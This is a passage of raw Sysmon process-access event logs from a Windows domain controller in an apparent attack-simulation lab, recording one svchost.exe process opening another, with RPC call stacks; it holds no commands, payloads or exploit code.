10341000x800000000000000011044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.680{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.680{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.680{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.680{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.680{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.680{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.680{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.680{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.680{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 